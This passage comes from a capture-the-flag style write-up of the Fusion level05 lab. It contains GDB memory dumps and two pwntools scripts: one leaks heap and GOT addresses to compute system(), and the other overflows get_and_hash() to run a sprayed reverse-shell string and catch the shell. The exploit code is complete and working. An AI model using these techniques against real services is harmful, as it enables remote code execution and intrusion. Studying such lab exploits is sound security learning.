    The only reason this exploit will work is because the heap contains a few addresses to functions in our code, presumably because the chunk is not properly free’d. Let’s look for those. The steps I’m taking here:<\/p>\n
      \n
    1. Print the address of the childtask()<\/code> function<\/li>\n
    2. Search for that address in memory<\/li>\n
    3. Show the heap chunks (NOTE: If you do this after spraying the heap, it will take a LONG time and try to display ALL of the chunks. Hit Ctrl+C immediately after using the heap chunks<\/code> command to get just the first few.)<\/li>\n
    4. Get the difference of the address of the start of my heap spraying and the childtask()<\/code> pointer location<\/li>\n
    5. Divide that difference by 4<\/li>\n
    6. Use the dereference<\/code> command to show the last 34 word values of that large chunk before our heap spraying<\/li>\n<\/ol>\n
      \r\ngef\u27a4  p childtask\r\n$1 = {void (void *)} 0xb78d9c70 <childtask>\r\n\r\ngef\u27a4  search-pattern 0xb78d9c70\r\n[+] Searching '\\x70\\x9c\\x8d\\xb7' in memory\r\n[+] In (0xb76ed000-0xb772f000), permission=rw-\r\n  0xb772d130 - 0xb772d140  \u2192   "\\x70\\x9c\\x8d\\xb7[...]" \r\n[+] In '[heap]'(0xb8c14000-0xb8c35000), permission=rw-\r\n  0xb8c1c6ec - 0xb8c1c6fc  \u2192   "\\x70\\x9c\\x8d\\xb7[...]" \r\n  0xb8c1c840 - 0xb8c1c850  \u2192   "\\x70\\x9c\\x8d\\xb7[...]" \r\n  0xb8c247c8 - 0xb8c247d8  \u2192   "\\x70\\x9c\\x8d\\xb7[...]" \r\n\r\ngef\u27a4  heap chunks \r\nChunk(addr=0xb8c14008, size=0x108, flags=PREV_INUSE)\r\n    [0xb8c14008     08 d0 6e b7 10 41 c1 b8 b0 c4 c1 b8 a0 4e c2 b8    ..n..A.......N..]\r\nChunk(addr=0xb8c14110, size=0x83a0, flags=PREV_INUSE)\r\n    [0xb8c14110     66 64 74 61 73 6b 00 00 00 00 00 00 00 00 00 00    fdtask..........]\r\nChunk(addr=0xb8c1c4b0, size=0x83a0, flags=PREV_INUSE)\r\n    [0xb8c1c4b0     98 4e c2 b8 30 84 8a b7 00 00 00 00 00 00 00 00    .N..0...........]\r\nChunk(addr=0xb8c24850, size=0x10, flags=)\r\n    [0xb8c24850     04 00 00 00 60 48 c2 b8 00 00 00 00 01 02 00 00    ....`H..........]\r\nChunk(addr=0xb8c24860, size=0x200, flags=PREV_INUSE)\r\n    [0xb8c24860     41 42 43 00 2f 62 69 6e 2f 73 68 20 3e 20 2f 64    ABC.\/bin\/sh > \/d]\r\n...\r\n\r\ngef\u27a4  p\/d 0xb8c24850 - 0xb8c247c8\r\n$2 = 136\r\n\r\ngef\u27a4  p\/d 136 \/ 4\r\n$3 = 34\r\n\r\ngef\u27a4  dereference 0xb8c247c8 34\r\n0xb8c247c8\u2502+0x0000: 0xb78d9c70  \u2192  <childtask+0> push ebp\r\n0xb8c247cc\u2502+0x0004: 0xb8c1c72c  \u2192  0x00000000\r\n0xb8c247d0\u2502+0x0008: 0xb78e160c  \u2192  0x00000000\r\n0xb8c247d4\u2502+0x000c: 0xb776c629  \u2192  <swapcontext+89> pop ebx\r\n0xb8c247d8\u2502+0x0010: 0x00000002\r\n0xb8c247dc\u2502+0x0014: 0xb78dc349  \u2192  <taskswitch+41> test eax, eax\r\n0xb8c247e0\u2502+0x0018: 0xb8c1c6c0  \u2192  0x00000000\r\n0xb8c247e4\u2502+0x001c: 0xb78e15a0  \u2192  0x00000000\r\n0xb8c247e8\u2502+0x0020: 0x00000000\r\n0xb8c247ec\u2502+0x0024: 0x00000000\r\n0xb8c247f0\u2502+0x0028: 0x00000000\r\n0xb8c247f4\u2502+0x002c: 0x00000000\r\n0xb8c247f8\u2502+0x0030: 0xb78dc380  \u2192  <taskstart+0> sub esp, 0x1c\r\n0xb8c247fc\u2502+0x0034: 0xb776c5ab  \u2192  <makecontext+75> lea esp, [esp+ebx*4]\r\n0xb8c24800\u2502+0x0038: 0x00000000\r\n0xb8c24804\u2502+0x003c: 0x00000000\r\n...\r\n<\/pre>\n
      You can see there’s a couple of other function addresses in here, there’s no particular reason to use childtask()<\/code> over the others.<\/p>\n
      Next, I’ll need to find the offset of the wite@got.plt<\/code> location from where the pointer to childtask()<\/code> is. I’ll first ask GDB to print the address of write()<\/code> in libc and search memory for that address. This will be the location in the .got.plt section that stores its location. Then we just subtract the location of childtask()<\/code> from the write()<\/code> address stored in .got.plt to find the offset. We can use this offset because the heap contains a pointer to childtask()<\/code> and is always at the same location (near the beginning of the heap):<\/p>\n
      \r\ngef\u27a4  p write\r\n$1 = {<text variable, no debug info>} 0xb76382c0 <write>\r\n\r\ngef\u27a4  search-pattern 0xb76382c0\r\n[+] Searching '\\xc0\\x82\\x63\\xb7' in memory\r\n[+] In '\/opt\/fusion\/bin\/level05'(0xb7726000-0xb7727000), permission=rw-\r\n  0xb77261a8 - 0xb77261b8  \u2192   "\\xc0\\x82\\x63\\xb7[...]" \r\n\r\ngef\u27a4  p childtask\r\n$2 = {void (void *)} 0xb7721c70 <childtask>\r\n\r\ngef\u27a4  p 0xb77261a8 - 0xb7721c70\r\n$3 = 0x4538\r\n<\/pre>\n
      This offset value will be the same each time the program is loaded into memory.<\/p>\n
      In summary, we’ll need to:<\/p>\n
        \n
      1. Find childtask()<\/code> pointer stored in the heap<\/li>\n
      2. Find the write()<\/code> function address stored in the .got.plt section<\/li>\n
      3. Calculate the address to system()<\/code><\/li>\n<\/ol>\n
        Here’s the script I wrote to find the childtask()<\/code> pointer in the heap and display the required addresses.<\/p>\n
        \r\n#!\/usr\/bin\/env python3\r\n\r\nfrom pwn import *\r\nimport time\r\nimport sys\r\n\r\n##################\r\nFD = 0xb97001b0  # Use the address found from leaking the file descriptor\r\n##################\r\nbad_chars = [b'\0', b'\\x0a', b'\\x0d', b'\\x40']\r\ncontent  = b"checkname "\r\ncontent += b"A" * 32\r\nalign = 0x860\r\n#context.log_level = 'DEBUG'\r\n\r\n\r\ndef send(read_ptr):\r\n    payload  = content\r\n    payload += p32(FD)\r\n    payload += p32(read_ptr)\r\n    io.sendline(payload)\r\n    return io.recvline(timeout=0.1)\r\n\r\n\r\ndef bad(addr):\r\n    if any(bad in p32(addr) for bad in bad_chars):\r\n        return True\r\n    else:\r\n        return False\r\n\r\n\r\nif bad(FD):\r\n    log.error("File descriptor address contains a bad byte.")\r\n\r\nio = remote("fusion", 20005)\r\nlog.info(io.recvline())\r\nread = ((FD - align - 1) & 0xfffff000) + align\r\n# Keep track of when the previous address contained a bad byte\r\nprev_bad = False\r\nlog.info("Searching...")\r\n\r\nwhile read > 0xb7000000:\r\n    if bad(read):\r\n        #log.failure(f"Bad byte found in address {read:#010x}")\r\n        prev_bad = True\r\n        read -= 0x1000\r\n        continue\r\n\r\n    time.sleep(0.005)\r\n    data = send(read)\r\n\r\n    if not data:\r\n        log.error("No data received. Either the program crashed or you have a bad file descriptor address.")\r\n\r\n    elif data[:3] == b"ABC":\r\n        prev_inuse = send(read - 24)\r\n\r\n        if prev_inuse[:2] == b"\\xa0\\x83":\r\n            # childtask() ptr offset from start of user-supplied heap = -136 bytes\r\n            childtask_str = send(read - 136)\r\n            childtask = unpack(childtask_str[:4])\r\n            write_str = send(childtask + 0x4538)\r\n            write_addr = unpack(write_str[:4])\r\n            log.info(f"Last address read: {read-136:#010x}")\r\n            log.success(f"Found address to childtask(): {childtask:#010x}")\r\n            log.success(f"   The write@got.plt address: {(childtask+0x4538):#010x}")\r\n            log.success(f"   The address to write() is: {write_addr:#010x}")\r\n            log.success(f"  The address to system() is: {(write_addr-0x847a0):#010x}")\r\n            break\r\n\r\n    elif data == b" is not indexed already\\n" and prev_bad:\r\n        log.failure(f"The last address read ({read+0x1000:#010x}) contained a bad byte and now we've hit a null region.\\n"\r\n                    "The pointer to childtask() may be unreadable if its address has one or more bad bytes in it."\r\n                    "It is recommended to crash the program so you can start over.")\r\n        log.warning("NOTE: You will need to spray the heap again")\r\n        crash = input("Crash the program? [Y\/n] ")\r\n\r\n        if crash.lower() == "n":\r\n            log.failure("Exiting")\r\n            sys.exit(1)\r\n        else:\r\n            log.warning("OK, crashing the program")\r\n            io.sendline(content + b"A"*12)\r\n            sys.exit(1)\r\n\r\n    elif data == b" is not indexed already\\n" and not prev_bad:\r\n        log.failure("We've hit a null region. Something went wrong.")\r\n        log.info(f"Last address read: {read+0x1000:#010x}")\r\n        sys.exit(1)\r\n\r\n    read -= 0x1000\r\n    prev_bad = False\r\n<\/pre>\n
        This went through a lot of trial-and-error and there’s probably a better way of doing it than this. But it works.<\/p>\n
        andrew ~\/level05 $ .\/find_system.py
        \n[+] Opening connection to fusion on port 20005: Done
        \n[*] ** welcome to level05 **
        \n[*] Searching…
        \n[*] Last address read: 0xb876f7d8
        \n[+] Found address to childtask(): 0xb7876c70
        \n[+]    The write@got.plt address: 0xb787b1a8
        \n[+]    The address to write() is: 0xb778d2c0
        \n[+]   The address to system() is: 0xb7708b20<\/p>\n
        Getting A Reverse Shell<\/h2>\n
        Now that we have the address to the system()<\/code> function, We can use the buffer overflow in the get_and_hash()<\/code> function to take control of the program and execute our reverse shell string. It’s as simple as overwriting the saved EIP register on the stack with the address to system()<\/code> and and supplying it with the address to our reverse shell string as an argument.<\/p>\n
        \r\n#!\/usr\/bin\/env python3\r\n\r\nfrom pwn import *\r\nimport sys\r\n\r\nbad_chars = [b'\0', b'\\x0a', b'\\x0d', b'\\x40']\r\ndef bad(addr):\r\n    if any(bad in p32(addr) for bad in bad_chars):\r\n        return True\r\n    else:\r\n        return False\r\n\r\n###################\r\nSYSTEM = 0xb7750b20\r\nSTRING = 0xb87c9864\r\n###################\r\nif bad(SYSTEM):\r\n    log.failure("The system() address contains a bad byte"\r\n                "It is recommended to crash the program so you can start over.")\r\n    log.warning("NOTE: You will need to spray the heap again")\r\n    crash = input("Crash the program? [Y\/n] ")\r\n    if crash.lower() == "n":\r\n        log.failure("Exiting")\r\n        sys.exit(1)\r\n    else:\r\n        log.warning("OK, crashing the program")\r\n        io.sendline(content + b"A"*12)\r\n        sys.exit(1)\r\n\r\ncontent  = b"checkname "\r\ncontent += b"A" * 44\r\ncontent += p32(SYSTEM)\r\ncontent += b"A" * 4\r\ncontent += p32(STRING)\r\n\r\nio = remote("fusion", 20005)\r\nlog.info(io.recvline())\r\nl = listen(1337)\r\nio.sendline(content)\r\n\r\nl.wait_for_connection()\r\nl.interactive()\r\n<\/pre>\n
        \r\nandrew ~\/level05 $ .\/rshell.py \r\n[+] Opening connection to fusion on port 20005: Done\r\n[*] ** welcome to level05 **\r\n[+] Trying to bind to :: on port 1337: Done\r\n[+] Waiting for connections on :::1337: Got connection from ::ffff:10.0.1.5 on port 55669\r\n[*] Switching to interactive mode\r\n$ id\r\nuid=20005 gid=20005 groups=20005\r\n$\r\n<\/pre>\n
        Conclusion<\/h1>\n
        Wow, this was a long one. I did my best to explain everything as much as possible. Of course, some prerequisite knowledge is still required. But if you, dear reader, feel like I did a poor job at explaining something, leave a comment. It is my goal here to provide the best write-up possible.<\/p>\n
        Here’s a quick TLDR on what we did:<\/p>\n
          \n
        • Spray the heap with a reverse shell string<\/li>\n
            \n
          • Need enough to ensure we can start guessing at addresses and hit our data<\/li>\n
          • This is only possible because the program does not properly free heap-allocated space<\/li>\n<\/ul>\n
          • Use the BOF vulnerability in the get_and_hash()<\/code> function to find a valid file descriptor address in our data<\/li>\n